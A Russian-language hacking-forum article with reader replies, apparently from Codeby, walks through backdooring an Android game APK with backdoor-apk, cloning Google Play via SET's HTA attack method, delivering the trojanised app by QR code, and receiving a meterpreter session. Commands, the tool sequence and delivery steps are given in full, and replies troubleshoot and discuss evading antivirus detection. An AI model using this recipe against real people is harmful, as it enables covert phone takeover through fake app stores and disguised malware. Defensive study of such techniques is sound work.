• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

upload_2016-12-5_13-26-37.png


Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone https://github.com/dana-at-cp/backdoor-apk.git

upload_2016-12-5_13-27-3.png


Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.


Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png


Сохраняем файл:

upload_2016-12-5_13-30-4.png


Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png


Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png


Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png


Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png


На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:


> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png


Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png


Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png


Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store


upload_2016-12-5_13-38-50.png


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png


Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

upload_2016-12-5_13-40-34.png


Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png


Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png


На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png


Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png


Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

upload_2016-12-5_13-43-11.png


Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png


И затем, запустим игру.

upload_2016-12-5_13-44-4.png


В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png


На этом все, спасибо за внимание.
 
K

kiwihaker

[*] Running backdoor-apk.sh v0.1.7 on Вт дек 6 21:13:24 MSK 2016
./backdoor-apk.sh: строка 64: $LOG_FILE: неоднозначное перенаправление
[!] Check your environment and configuration. Couldn't find: msfvenom
 
  • Нравится
Реакции: citizen2517
M

m0tion

Вот видос(не мой), всё очень подробно объясняется.
 
  • Нравится
Реакции: citizen2517
L

Leon

на parrot os 3.1 i386 со способом работала на многих приложениях с установкой oracle java и ручной установкой apktool со способом от kuklofona с apk-embed а на 3.2 parrot никак
 
  • Нравится
Реакции: citizen2517

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Вот видос(не мой), всё очень подробно объясняется.
Возможно немного офтоп,за что прошу извинить) Но все же думаю, что достойна внимания моя следующия мысль:

Хочу обратить ваше внимания что видос сделан тупо по статье @Vander которой он опубликовал 5-декабра,срок публикации видео - 7 декабря. К тому же в ходе видео очень много не грамотных разьяснений ,например он сказал что параметр RHOST отвечает за наш локальный айпи" бред - дальше уже можно смело не слушать его...
Так что пойду ка я его обсирать критиковать в коментах. Возможно найдеться группа людей кто поддерживает мое мнение - присойденяйтесь к тролингу)
К тому же хочу заметить что это тот же чел которого обсирал критиковал Ваня Глазков публично за его ламерство.

 

codefix

One Level
07.02.2017
2
1
BIT
2
Вот интересно если кто сможет на Андройд 6-7 повысить уровень приведений и добавить приложение в состав админ...к примеру на android 6 (galaxy s7) выполнение adb shell pm hide com.. не работает от user, а вот если apk добавлена в группу админ то пожалуйста....
 
  • Нравится
Реакции: citizen2517
S

spike

Вопрос от новичка. Не получается найти пакеты
*
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Чтение списков пакетов… Готово
Построение дерева зависимостей
Чтение информации о состоянии… Готово
E: Не удалось найти пакет lib32stdc++6
E: Не удалось найти пакет с помощью regex «lib32stdc++6»
E: Не удалось найти пакет lib32ncurses5
E: Не удалось найти пакет lib32z1
*
Подскажите, что делать.
 
  • Нравится
Реакции: citizen2517
D

DoberGroup

Подскажите, что делать.
Рассказать что-нибудь про свою операционку, что бы мы не соревновались в склонности к телепатии.
Ну а за одно, что бы два раза не вставать - выложите список подключенных репозитариев.
 
  • Нравится
Реакции: citizen2517
S

spike

Рассказать что-нибудь про свою операционку, что бы мы не соревновались в склонности к телепатии.
Ну а за одно, что бы два раза не вставать - выложите список подключенных репозитариев.
Kali linux 2.0 64b, установил пару дней назад, за это время ничего не качал и не устанавливал.

Репозитории:
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb kali-rolling main non-free contrib
deb-src kali-rolling main non-free contrib
Поправте, если что
 
  • Нравится
Реакции: citizen2517

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

Не совсем понял - для чего переименовать файл в Launcher.apk, вроде и без этого не плохо и не так подозрительно :)
[doublepost=1487351367,1487312230][/doublepost]И хотел поинтересоваться - сильно отличается от https://codeby.net/threads/vzlom-android-ustrojstva.58136/page-5 ? Я так понял функционал одинаковый, только, как сложилось, дрвеб проглотил созданный при помощи данного способа норм, а при способе по ссылке ( Spade ) спалил на 2 раз. Может кто долго использовал данные фреймы и может написать в чем у них разница координальная?
 
Последнее редактирование:
  • Нравится
Реакции: DoberGroup

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Не совсем понял - для чего переименовать файл в Launcher.apk, вроде и без этого не плохо и не так подозрительно :)
Насколько помню, в настройках сервера HTA было прописано имя Launcher.apk, можно поменять и не переименовывать
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!